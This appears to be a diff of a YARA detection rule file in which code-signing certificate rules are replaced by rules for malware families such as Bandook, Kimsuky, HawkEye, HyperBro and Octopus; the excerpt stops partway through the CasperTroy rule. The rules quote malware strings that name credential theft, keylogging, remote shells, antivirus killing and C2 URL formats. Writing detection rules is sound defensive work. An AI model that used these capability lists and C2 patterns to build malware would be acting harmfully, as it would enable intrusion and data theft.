+		$s1 = "PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null" fullword ascii
+		$s2 = "DQuasar.Common, Version=1.4.0.0, Culture=neutral, PublicKeyToken=null" fullword ascii
+		$s3 = "Process already elevated." fullword wide
+		$s4 = "get_PotentiallyVulnerablePasswords" fullword ascii
+		$s5 = "GetKeyloggerLogsDirectory" ascii
+		$s6 = "set_PotentiallyVulnerablePasswords" fullword ascii
+		$s7 = "BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TestCert" and pe.signatures [ i ] . serial == "1a:fd:14:91:d5:2f:89:ba:41:fa:6c:02:81:bb:97:16" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_719Ac44966D05762Ef95245Eefcf3046 : FILE
+rule DITEKSHEN_MALWARE_Win_Bandook : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "e215971c-67f0-5fdb-9525-7aef2559674f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects Bandook backdoor"
+		author = "ditekshen"
+		id = "c74bd688-c79e-5939-93a8-c2cd9f2cd60e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5526-L5537"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2676-L2705"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2b7c5ccc7a09d3917cf8625bc3e78526ba9620eb8bb08490124c24a5c2eda629"
+		logic_hash = "bff09f769aae890d81efe9926cc8ce85c1caa4eeeb6bc7d2321d2d906ac8d6cf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "57ecdfa48ed03a5a8177887090b3d1ffaf124846"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.Bandook"
+
+	strings:
+		$s1 = "\"%sLib\\dpx.pyc\" \"%ws\" \"%ws\" \"%ws\" \"%ws\" \"%ws\"" fullword wide
+		$s2 = "%s\\usd\\dv-%s.dat" fullword ascii
+		$s3 = "%sprd.dat" fullword ascii
+		$s4 = "%sfile\\shell\\open\\command" fullword ascii
+		$s5 = "explorer.exe , %s" fullword ascii
+		$f1 = "CaptureScreen" fullword ascii
+		$f2 = "StartShell" fullword ascii
+		$f3 = "ClearCred" fullword ascii
+		$f4 = "GrabFileFromDevice" fullword ascii
+		$f5 = "PutFileOnDevice" fullword ascii
+		$f6 = "ChromeInject" fullword ascii
+		$f7 = "StartFileMonitor" fullword ascii
+		$f8 = "DisableMouseCapture" fullword ascii
+		$f9 = "StealUSB" fullword ascii
+		$f10 = "DDOSON" fullword ascii
+		$f11 = "InstallMac" fullword ascii
+		$f12 = "SendCam" fullword ascii
+		$x1 = "RTC-TGUBP" fullword ascii
+		$x2 = "AVE_MARIA" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "jZQtQDMvyDRzWsoVFeitFmeNcWMtKauvidXSUrSEwqmi" and pe.signatures [ i ] . serial == "71:9a:c4:49:66:d0:57:62:ef:95:24:5e:ef:cf:30:46" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 6 of ( $f* ) or ( 2 of ( $s* ) and 3 of ( $f* ) ) or ( all of ( $x* ) and ( 2 of ( $f* ) or 3 of ( $s* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_008Fe807310D98357A59382090634B93F0 : FILE
+rule DITEKSHEN_MALWARE_Win_Kimsuky : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "bf4326b3-a838-5dff-a6e1-ac71c6fb871d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects Kimsuky backdoor"
+		author = "ditekshen"
+		id = "6216b874-13f1-5283-9d17-90b7ca6996f8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5539-L5550"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2707-L2730"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a90430a6f07f67ead37e5cba9f0baee92551511a9f33a2a1fd3d2419322aaa8b"
+		logic_hash = "9f9e64a9cfb3f61bc6b355035c5f0644e4750b740e05cb557c6183c7acfc5a19"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "acd6cf38d03c355ddb84b96a7365bfc1738a0ec5"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.Kimsuky"
+
+	strings:
+		$s1 = "Win%d.%d.%dx64" fullword ascii
+		$s2 = ".zip" fullword ascii
+		$s3 = ".enc" fullword ascii
+		$s4 = "&p2=a" fullword ascii
+		$s5 = "Content-Disposition: form-data; name=\"binary\"; filename=\"" fullword ascii
+		$s6 = "%s/?m=a&p1=%s&p2=%s-%s-v%d" fullword ascii
+		$s7 = "/?m=b&p1=" fullword ascii
+		$s8 = "/?m=c&p1=" fullword ascii
+		$s9 = "/?m=d&p1=" fullword ascii
+		$s10 = "http://%s/%s/?m=e&p1=%s&p2=%s&p3=%s" fullword ascii
+		$s11 = "taskkill.exe /im iexplore.exe /f" fullword ascii
+		$s12 = "GetParent" fullword ascii
+		$s13 = "DllRegisterServer" fullword ascii
+		$dll1 = "AutoUpdate.dll" fullword ascii
+		$dll2 = "dropper-ie64.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAVE MEDIA" and pe.signatures [ i ] . serial == "00:8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $dll* ) and 7 of ( $s* ) ) or ( 11 of ( $* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00801689896Ed339237464A41A2900A969 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent03 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects known Delphi downloader agent downloading second stage payload, notably from discord"
 		author = "ditekSHen"
-		id = "91cecd18-0007-59a4-94f3-bdaa06b25822"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "18493e3d-224f-5000-8e44-9ffda9c65cf0"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5552-L5563"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2732-L2753"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9dc505e00e0085587aee2bf2e70db04850e11d057b8d16e31e8caebb130e047b"
+		logic_hash = "dea63edd48759fd04875e2eb8ac8b00ff801767f071337c667e31c15f0925cdc"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "9b0ab2e7f3514f6372d14b1f7f963c155b18bd24"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.DLAgent03"
+
+	strings:
+		$delph1 = "FastMM Borland Edition" fullword ascii
+		$delph2 = "SOFTWARE\\Borland\\Delphi" ascii
+		$v1_1 = "InternetOpenUrlA" fullword ascii
+		$v1_2 = "CreateFileA" fullword ascii
+		$v1_3 = "WriteFile" fullword ascii
+		$v2_1 = "WinHttp.WinHttpRequest.5.1" fullword ascii
+		$v2_2 = { 6f 70 65 6e ?? ?? ?? ?? ?? 73 65 6e 64 ?? ?? ?? ?? 72 65 73 70 6f 6e 73 65 74 65 78 74 }
+		$url1 = "https://discord.com/" fullword ascii
+		$url2 = "http://www.superutils.com" fullword ascii
+		$url3 = "http://www.xboxharddrive.com" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLG Rental ApS" and pe.signatures [ i ] . serial == "00:80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69" )
+		uint16( 0 ) == 0x5a4d and 1 of ( $delph* ) and 1 of ( $url* ) and ( all of ( $v1* ) or 1 of ( $v2* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Podangers : FILE
+rule DITEKSHEN_MALWARE_Win_Salfram : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Salfram executables"
 		author = "ditekSHen"
-		id = "b394c4a1-1614-578f-bbfc-6eb9998b4a06"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "323e1c8e-2184-5831-9af5-a460c55fbf7c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5565-L5576"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2755-L2766"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6a041e8ae4a7a1af59b81799b5c014691e347c8305266adeffd9d49337712b2e"
+		logic_hash = "19d7934727baa870dcd3ec77ba596cd64e49763477ba3feb7baec5ab6d3866d3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6e757c3b91d75d58b5230c27a2fcc01bfe5fe60f"
-		importance = 20
+		snort2_sid = "920085-920087"
+		snort3_sid = "920085"
+		clamav_sig = "MALWARE.Win.Trojan.Salfram"
+
+	strings:
+		$s1 = "!This Salfram cannot be run in DOS mode." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PODANGERS" and pe.signatures [ i ] . serial == "00" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00E9A1E07314Bc2F2D51818454B63E5829 : FILE
+rule DITEKSHEN_MALWARE_Win_Hawkeyev9
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "2c9f0497-0fcd-591c-be72-e92464b689f3"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects HawkEyeV9 payload"
+		author = "ditekshen"
+		id = "ca59aa45-fb55-5f9a-a224-8bd2b72ce5ac"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5578-L5589"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2768-L2793"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e3dfb75350bcdbb6861612f2f6cc757724260f99e4024df2b20c7b273bc50266"
+		logic_hash = "d24111930dd0230c01963a90c9fbbc0a0a71df170c2ca116bb329e6158cb681c"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "3a146f3c0fc17b9df14bd127ebf12b15a5a1a011"
-		importance = 20
+		tags = ""
+		clamav_sig = "MALWARE.Win.Trojan.HawkEyeV9"
+
+	strings:
+		$id1 = "HawkEye Keylogger - Reborn v9 - {0} Logs - {1} \\ {2}" wide
+		$id2 = "HawkEye Keylogger - Reborn v9{0}{1} Logs{0}{2} \\ {3}{0}{0}{4}" wide
+		$str1 = "_PasswordStealer" ascii
+		$str2 = "_KeyStrokeLogger" ascii
+		$str3 = "_ScreenshotLogger" ascii
+		$str4 = "_ClipboardLogger" ascii
+		$str5 = "_WebCamLogger" ascii
+		$str6 = "_AntiVirusKiller" ascii
+		$str7 = "_ProcessElevation" ascii
+		$str8 = "_DisableCommandPrompt" ascii
+		$str9 = "_WebsiteBlocker" ascii
+		$str10 = "_DisableTaskManager" ascii
+		$str11 = "_AntiDebugger" ascii
+		$str12 = "_WebsiteVisitorSites" ascii
+		$str13 = "_DisableRegEdit" ascii
+		$str14 = "_ExecutionDelay" ascii
+		$str15 = "_InstallStartupPersistance" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "iWLiYpLtpOlZYGmysAZkhz" and pe.signatures [ i ] . serial == "00:e9:a1:e0:73:14:bc:2f:2d:51:81:84:54:b6:3e:58:29" )
+		int16 ( 0 ) == 0x5a4d and ( 1 of ( $id* ) or 5 of ( $str* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_9D915138Acdac1A044Afa6E5D99567C5 : FILE
+rule DITEKSHEN_MALWARE_Win_Hyperbro : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects HyperBro (class names) payload"
 		author = "ditekSHen"
-		id = "89182dfb-b100-573c-85ae-38bdf7f24a64"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "539b796d-297b-5e2f-84df-282ceaa57bd4"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5591-L5602"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2795-L2813"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "32fb0d12a9b61461104e29571fcc7210f7ea8a82a8e240c747a0070d8d43a9b0"
+		logic_hash = "f6e86ef963de885e0bf92ead075e265618c0745104d223302edd824d409c45cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4f8b9ce0e25810d1b62d8c016607de128beba2a1"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.HyperBro"
+
+	strings:
+		$s1 = "VTClipboardInfo" ascii wide
+		$s2 = "VTClipboardMgr" ascii wide
+		$s3 = "VTFileRename" ascii wide
+		$s4 = "VTFileRetime" ascii wide
+		$s5 = "VTKeyboardInfo" ascii wide
+		$s6 = "VTKeyboardMgr" ascii wide
+		$s7 = "VTRegeditKeyInfo" ascii wide
+		$s8 = "VTRegeditMgr" ascii wide
+		$s9 = "VTRegeditValueInfo" ascii wide
+		$s10 = "VTFileDataRes" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AAAruntest" and pe.signatures [ i ] . serial == "9d:91:51:38:ac:da:c1:a0:44:af:a6:e5:d9:95:67:c5" )
+		uint16( 0 ) == 0x5a4d and 9 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_11A9Bf6B2Dcbc683475B431A1C79133E : FILE
+rule DITEKSHEN_MALWARE_Linux_UNK01 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown/unidentified Linux malware"
 		author = "ditekSHen"
-		id = "9c49f529-330f-5d37-b613-e45aad50afcb"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "24c6ff35-9378-5a6b-90d1-9740917b1b72"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5604-L5615"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2815-L2836"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fa424180e60d2fde2fce085d0c848c5b33bcc58c2ca54f327f446ff5cf361fe2"
+		logic_hash = "8bb4822c1c7e0f52726ecafafa696d83c741257587f351360c5295163c245450"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7412b3f5ba689967a5b46e6ef5dc5e9b9de3917d"
-		importance = 20
+
+	strings:
+		$f1 = "%sresponse.php?status" ascii
+		$f2 = "%supstream.php?mid=%s&os=%s" ascii fullword
+		$f3 = "%supstream.php?tid=%" ascii
+		$f4 = "%sindex.php?token=%.32s&flag=%d&name=%s" ascii fullword
+		$f5 = "%sactive_off.php?id=%d&uniqu=%d" ascii fullword
+		$s1 = "lock:%i usable num:%i n:%i" fullword ascii
+		$s2 = "tid:%.*s tNumber:%i" fullword ascii
+		$s3 = "init.php" fullword ascii
+		$s4 = "mod_drone" fullword ascii
+		$s5 = "new_mid" fullword ascii
+		$s6 = "&exists[]=" fullword ascii
+		$s7 = "&mod[]=" fullword ascii
+		$s8 = "shutdown" fullword ascii
+		$s9 = "&mac[]=%02X%02X%02X%02X%02X%02X" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BINDOX" and pe.signatures [ i ] . serial == "11:a9:bf:6b:2d:cb:c6:83:47:5b:43:1a:1c:79:13:3e" )
+		uint16( 0 ) == 0x457f and ( 3 of ( $f* ) or 6 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3Fd3661533Eef209153C9Afec3Ba4D8A : FILE
+rule DITEKSHEN_MALWARE_Linux_UNK02 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown/unidentified Linux malware"
 		author = "ditekSHen"
-		id = "d47bc223-f29e-54d3-a452-064f89fa80f7"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "6e62df0d-d329-5e52-af74-2a1f19dc4cca"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5617-L5628"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2838-L2852"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e9662abf4c70d54fc719850ef216352fd59a559726fbad5db9e265660400b432"
+		logic_hash = "4cde21932c27fe3c08495f557b5e086b1fb668d8b5508249891828b9ed48edd4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "20ddd23f53e1ac49926335ec3e685a515ab49252"
-		importance = 20
+
+	strings:
+		$rf1 = "[]A\\A]A^A_" ascii
+		$rf2 = "[A\\A]A^A_]" ascii
+		$f1 = "/bin/basH" ascii fullword
+		$f2 = "/proc/seH" ascii fullword
+		$f3 = "/dev/ptsH" ascii fullword
+		$f4 = "pqrstuvwxyzabcde" ascii fullword
+		$f5 = "libnss_%s.so.%d.%d" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SFB Regnskabsservice ApS" and pe.signatures [ i ] . serial == "3f:d3:66:15:33:ee:f2:09:15:3c:9a:fe:c3:ba:4d:8a" )
+		uint16( 0 ) == 0x457f and ( all of ( $f* ) and #rf1 > 3 and #rf2 > 3 )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2Ba40F65086686Dd4Ab7171E : FILE
+rule DITEKSHEN_MALWARE_Win_Itranslatorexe : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects iTranslator EXE payload"
 		author = "ditekSHen"
-		id = "13909741-cba3-5143-86eb-bcc227cfaa9c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "763e8fa4-cf5c-54bc-9310-4e4171bf5a71"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5630-L5641"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2854-L2874"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8ed65c0b5d231be9dbbe34da493087d1bf83cf21c401435fed7e2851acdb6f60"
+		logic_hash = "3c796d58cdf2d4dc4c838d05fb862640c7f9de6c7e8ebb5fb0002821354208d9"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "842f81869c2f4f2ba2a7e6513501166e2679108a"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.iTranslator_EXE"
+
+	strings:
+		$s1 = "\\itranslator\\wintrans.exe" fullword wide
+		$s2 = "\\SuperX\\SuperX\\Obj\\Release\\SharpX.pdb" fullword ascii
+		$s3 = "\\itranslator\\itranslator.dll" fullword ascii
+		$s4 = ":Intoskrnl.exe" fullword ascii
+		$s5 = "InjectDrv.sys" fullword ascii
+		$s6 = "SharpX.dll" fullword wide
+		$s7 = "GetMicrosoftEdgeProcessId" ascii
+		$s8 = ".php?type=is&ch=" ascii
+		$s9 = ".php?uid=" ascii
+		$s10 = "&mc=" fullword ascii
+		$s11 = "&os=" fullword ascii
+		$s12 = "&x=32" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RITEIL SISTEMS LLC" and pe.signatures [ i ] . serial == "2b:a4:0f:65:08:66:86:dd:4a:b7:17:1e" )
+		uint16( 0 ) == 0x5a4d and 8 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_67144B9Ed89Fb2D106D0233873C6E35F : FILE
+rule DITEKSHEN_MALWARE_Win_Itranslatordll : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects iTranslator DLL payload"
 		author = "ditekSHen"
-		id = "f9806e55-9efa-504a-b27c-d3418fc5cd38"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "df05da78-3626-5eb5-81a2-a93fba844484"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5643-L5654"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2876-L2892"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9d3c39c590a75b3ea1d1f699bea279c0c68498e51e2ab7f4ad3e3f8857d6d668"
+		logic_hash = "ca0479efd241058f358553b6382a1987a5b4c069965f4adb88cd2f3fc4bef21a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5971faead4c86bf72e6ab36efc0376d4abfffeda"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.iTranslator_DLL"
+
+	strings:
+		$d1 = "system32\\drivers\\%S.sys" fullword wide
+		$d2 = "\\windows\\system32\\winlogon.exe" fullword ascii
+		$d3 = "\\Registry\\Machine\\SYSTEM\\ControlSet001\\services\\%s" fullword wide
+		$d4 = "\\Registry\\Machine\\SYSTEM\\ControlSet001\\services\\webssx" fullword wide
+		$d5 = "\\Device\\CtrlSM" fullword wide
+		$d6 = "\\DosDevices\\CtrlSM" fullword wide
+		$d7 = "\\driver_wfp\\CbFlt\\Bin\\CbFlt.pdb" ascii
+		$d8 = ".php" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Infosignal LLC" and pe.signatures [ i ] . serial == "67:14:4b:9e:d8:9f:b2:d1:06:d0:23:38:73:c6:e3:5f" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ca4822E6905Aa4Fca9E28523F04F14A3 : FILE
+rule DITEKSHEN_MALWWARE_Win_Octopus : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Octopus trojan payload"
 		author = "ditekSHen"
-		id = "713f84b3-b09a-5fcf-85ed-899be9f14b84"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "eb092e23-864f-52f3-bfa4-7e3c616d3984"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5656-L5667"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2894-L2917"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6e0d7abd82805019c6b1c9df2479489bbd3fe7a4a1703971c02324072692b1e5"
+		logic_hash = "012b75c94be3021dbcc5b8e8bd62f807c9aa8bc0df94f830a5294aaf0d21b9fc"
 		score = 75
-		quality = 75
+		quality = 23
 		tags = "FILE"
-		thumbprint = "35ced9662401f10fa92282e062a8b5588e0c674d"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.Octopus"
+
+	strings:
+		$s1 = "\\Mozilla\\Firefox\\Profiles\\" fullword wide
+		$s2 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword wide
+		$s3 = "\\wbem\\WMIC.exe" fullword wide
+		$s4 = ".profiles.ini" fullword wide
+		$s5 = "PushEBP_" ascii
+		$s6 = "MovEBP_ESP_" ascii
+		$s7 = "Embarcadero Delphi for Win32 compiler" ascii
+		$s8 = "TempWmicBatchFile.bat" fullword wide
+		$wq1 = "computersystem get Name /format:list" wide
+		$wq2 = "os get installdate /format:list" wide
+		$wq3 = "get serialnumber /format:list" wide
+		$wq4 = "\\\\\\\\.\\\\PHYSICALDRIVE" wide
+		$wq5 = "path CIM_LogicalDiskBasedOnPartition" wide
+		$wq6 = "get Antecedent,Dependent" wide
+		$wq7 = "path win32_physicalmedia" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELISTREID, OOO" and pe.signatures [ i ] . serial == "00:ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) and 5 of ( $wq* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3769815A97A8Fb411E005282B37878E3 : FILE
+rule DITEKSHEN_MALWARE_Win_Caspertroy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CasperTroy payload"
 		author = "ditekSHen"
-		id = "da41e9a7-1660-5157-9148-f2f774df647a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "822c3231-60ba-5e60-8df8-06dea80b318a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5669-L5680"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2919-L2931"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ccd548ebe2be2c7b44e6c39df50ffea4703d0b1decd78cc6fb4b3bbf9d85be0b"
+		logic_hash = "ce070b1e6279ef9fa47f84da7c5166cd93b3e7a0f95541ae14c048b2af9bc431"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c80fd3259af331743e35a2197f5f57061654860c"
-		importance = 20
+
+	strings:
+		$s1 = "DllTroy.dll" fullword ascii
+		$s2 = "Content-Disposition: form-data; name=\"image\"; filename=\"title.gif\"" fullword ascii
+		$s3 = "Content-Disposition: form-data; name=\"COOKIE_ID\"" fullword ascii
+		$s4 = "Content-Disposition: form-data; name=\"PHP_SESS_ID\"" fullword ascii
+		$s5 = "Content-Disposition: form-data; name=\"SESS_ID\"" fullword ascii
 
 	condition:
